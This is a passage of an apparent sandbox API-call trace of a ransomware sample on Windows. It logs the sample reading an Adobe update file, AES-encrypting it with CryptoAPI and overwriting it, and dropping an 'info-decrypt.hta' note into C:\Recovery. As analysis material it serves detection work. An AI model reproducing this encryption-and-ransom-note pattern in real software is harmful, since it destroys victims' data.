lpFilePart=0x0) returned 0x3e [0204.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee28) returned 1 [0204.089] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a4 [0204.089] GetFileType (hFile=0x5a4) returned 0x1 [0204.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee24) returned 1 [0204.089] GetFileType (hFile=0x5a4) returned 0x1 [0204.089] GetFileSize (in: hFile=0x5a4, lpFileSizeHigh=0x6e4ef30 | out: lpFileSizeHigh=0x6e4ef30*=0x0) returned 0x109d000 [0204.245] ReadFile (in: hFile=0x5a4, lpBuffer=0x10a21018, nNumberOfBytesToRead=0x109d000, lpNumberOfBytesRead=0x6e4eedc, lpOverlapped=0x0 | out: lpBuffer=0x10a21018*, lpNumberOfBytesRead=0x6e4eedc*=0x109d000, lpOverlapped=0x0) returned 1 [0206.943] CloseHandle (hObject=0x5a4) returned 1 [0206.943] CryptAcquireContextW (in: phProv=0x6e4ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6e4ee7c*=0x7a88f8) returned 1 [0206.944] CryptGenRandom (in: hProv=0x7a88f8, dwLen=0x10, pbBuffer=0x34b7448 | out: pbBuffer=0x34b7448) returned 1 [0208.208] CryptImportKey (in: hProv=0x7a88f8, pbData=0x34dd5dc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6e4ee4c | out: phKey=0x6e4ee4c*=0x77b2f0) returned 1 [0208.208] CryptContextAddRef (hProv=0x7a88f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.208] CryptContextAddRef (hProv=0x7a88f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.208] CryptDuplicateKey (in: hKey=0x77b2f0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6e4ee3c | out: phKey=0x6e4ee3c*=0x77b1f0) returned 1 [0208.208] CryptContextAddRef (hProv=0x7a88f8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.208] CryptSetKeyParam (hKey=0x77b1f0, dwParam=0x4, pbData=0x34dd6bc*=0x1, dwFlags=0x0) returned 1 [0208.208] CryptSetKeyParam (hKey=0x77b1f0, dwParam=0x1, pbData=0x34dd688, dwFlags=0x0) returned 1 [0208.690] CryptEncrypt (in: hKey=0x77b1f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1de01018*, pdwDataLen=0x6e4eea8*=0x109d010, dwBufLen=0x109d010 | out: pbData=0x1de01018*, pdwDataLen=0x6e4eea8*=0x109d010) returned 1 [0209.110] CryptEncrypt (in: hKey=0x77b1f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34dd6e4*, pdwDataLen=0x6e4eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x34dd6e4*, pdwDataLen=0x6e4eeb0*=0x10) returned 1 [0214.292] CryptDestroyKey (hKey=0x77b2f0) returned 1 [0214.292] CryptReleaseContext (hProv=0x7a88f8, dwFlags=0x0) returned 1 [0214.292] CryptReleaseContext (hProv=0x7a88f8, dwFlags=0x0) returned 1 [0214.292] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4e920, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", lpFilePart=0x0) returned 0x3e [0214.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee14) returned 1 [0214.292] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x204 [0214.483] GetFileType (hFile=0x204) returned 0x1 [0214.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee10) returned 1 [0214.483] GetFileType (hFile=0x204) returned 0x1 [0214.483] WriteFile (hFile=0x204, lpBuffer=0x480c1018, nNumberOfBytesToWrite=0x109d220, lpNumberOfBytesWritten=0x6e4eed0, lpOverlapped=0x0) Thread: id = 138 os_tid = 0x284 [0134.262] SysReAllocStringLen (in: pbstr=0x704f92c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x704f92c*="KERNEL32.DLL") returned 1 [0134.262] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.263] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.266] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.267] SysReAllocStringLen (in: pbstr=0x704f92c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x704f92c*="KERNEL32.DLL") returned 1 [0134.267] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.267] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.270] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.271] SysReAllocStringLen (in: pbstr=0x704f908*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x704f908*="KERNEL32.DLL") returned 1 [0134.271] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.271] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.274] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0134.277] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.278] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0134.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f25c) returned 1 [0134.279] GetFullPathNameW (in: lpFileName="C:\\Recovery", nBufferLength=0x105, lpBuffer=0x704ed64, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery", lpFilePart=0x0) returned 0xb [0134.279] GetFullPathNameW (in: lpFileName="C:\\Recovery\\", nBufferLength=0x105, lpBuffer=0x704ed38, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\", lpFilePart=0x0) returned 0xc [0134.279] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x704ef84 | out: lpFindFileData=0x704ef84*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.326] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef94 | out: lpFindFileData=0x704ef94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.327] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef94 | out: lpFindFileData=0x704ef94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0134.327] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef94 | out: lpFindFileData=0x704ef94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 0 [0134.327] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f21c) returned 1 [0134.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f228) returned 1 [0134.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f25c) returned 1 [0134.327] GetFullPathNameW (in: lpFileName="C:\\Recovery", nBufferLength=0x105, lpBuffer=0x704ed64, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery", lpFilePart=0x0) returned 0xb [0134.327] GetFullPathNameW (in: lpFileName="C:\\Recovery\\", nBufferLength=0x105, lpBuffer=0x704ed38, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\", lpFilePart=0x0) returned 0xc [0134.327] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x704ef84 | out: lpFindFileData=0x704ef84*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.327] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef94 | out: lpFindFileData=0x704ef94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.328] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef94 | out: lpFindFileData=0x704ef94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0134.328] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef94 | out: lpFindFileData=0x704ef94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0134.328] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f21c) returned 1 [0134.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f228) returned 1 [0134.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f20c) returned 1 [0134.328] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", nBufferLength=0x105, lpBuffer=0x704ed14, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpFilePart=0x0) returned 0x30 [0134.328] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", nBufferLength=0x105, lpBuffer=0x704ece8, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpFilePart=0x0) returned 0x31 [0134.328] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x704ef34 | out: lpFindFileData=0x704ef34*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.329] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef44 | out: lpFindFileData=0x704ef44*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.329] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef44 | out: lpFindFileData=0x704ef44*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0134.329] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef44 | out: lpFindFileData=0x704ef44*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0134.329] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef44 | out: lpFindFileData=0x704ef44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0134.329] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f1cc) returned 1 [0134.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f1d8) returned 1 [0134.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f20c) returned 1 [0134.329] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", nBufferLength=0x105, lpBuffer=0x704ed14, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpFilePart=0x0) returned 0x30 [0134.330] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", nBufferLength=0x105, lpBuffer=0x704ece8, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpFilePart=0x0) returned 0x31 [0134.330] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x704ef34 | out: lpFindFileData=0x704ef34*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0134.330] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef44 | out: lpFindFileData=0x704ef44*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.330] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef44 | out: lpFindFileData=0x704ef44*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0134.330] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef44 | out: lpFindFileData=0x704ef44*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0134.330] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x704ef44 | out: lpFindFileData=0x704ef44*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0134.330] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0134.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f1cc) returned 1 [0134.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f1d8) returned 1 [0136.560] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x704eccc, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0136.560] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x704ecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0136.560] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x704eccc, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", lpFilePart=0x0) returned 0x41 [0136.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f12c) returned 1 [0136.560] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x704f1a8 | out: lpFileInformation=0x704f1a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0136.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f128) returned 1 [0136.561] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x704ecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0136.561] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x704eb6c, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", lpFilePart=0x0) returned 0x41 [0136.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f060) returned 1 [0136.561] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4b8 [0136.833] GetFileType (hFile=0x4b8) returned 0x1 [0136.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f05c) returned 1 [0136.833] GetFileType (hFile=0x4b8) returned 0x1 [0136.833] WriteFile (in: hFile=0x4b8, lpBuffer=0x3401a40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x704f124, lpOverlapped=0x0 | out: lpBuffer=0x3401a40*, lpNumberOfBytesWritten=0x704f124*=0x1000, lpOverlapped=0x0) returned 1 [0136.834] WriteFile (in: hFile=0x4b8, lpBuffer=0x3401a40*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x704f0f8, lpOverlapped=0x0 | out: lpBuffer=0x3401a40*, lpNumberOfBytesWritten=0x704f0f8*=0x557, lpOverlapped=0x0) returned 1 [0136.834] CloseHandle (hObject=0x4b8) returned 1 [0136.835] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x704ec48, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0136.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f0f4) returned 1 [0136.835] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), fInfoLevelId=0x0, lpFileInformation=0x3402a5c | out: lpFileInformation=0x3402a5c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000)) returned 1 [0136.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f0f0) returned 1 [0136.835] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x704eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0136.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f028) returned 1 [0136.835] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4b8 [0136.835] GetFileType (hFile=0x4b8) returned 0x1 [0136.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f024) returned 1 [0136.835] GetFileType (hFile=0x4b8) returned 0x1 [0136.835] GetFileSize (in: hFile=0x4b8, lpFileSizeHigh=0x704f130 | out: lpFileSizeHigh=0x704f130*=0x0) returned 0x306000 [0136.844] ReadFile (in: hFile=0x4b8, lpBuffer=0x43ec8f0, nNumberOfBytesToRead=0x306000, lpNumberOfBytesRead=0x704f0dc, lpOverlapped=0x0 | out: lpBuffer=0x43ec8f0*, lpNumberOfBytesRead=0x704f0dc*=0x306000, lpOverlapped=0x0) returned 1 [0137.248] CloseHandle (hObject=0x4b8) returned 1 [0139.212] SysReAllocStringLen (in: pbstr=0x704e438*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x704e438*="advapi32") returned 1 [0139.212] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0139.212] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0139.351] GetLastError () returned 0x0 [0139.351] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0139.352] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0139.352] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x704e31c, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0139.352] GetCurrentProcess () returned 0xffffffff [0139.352] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x704e420*=0x77711520, 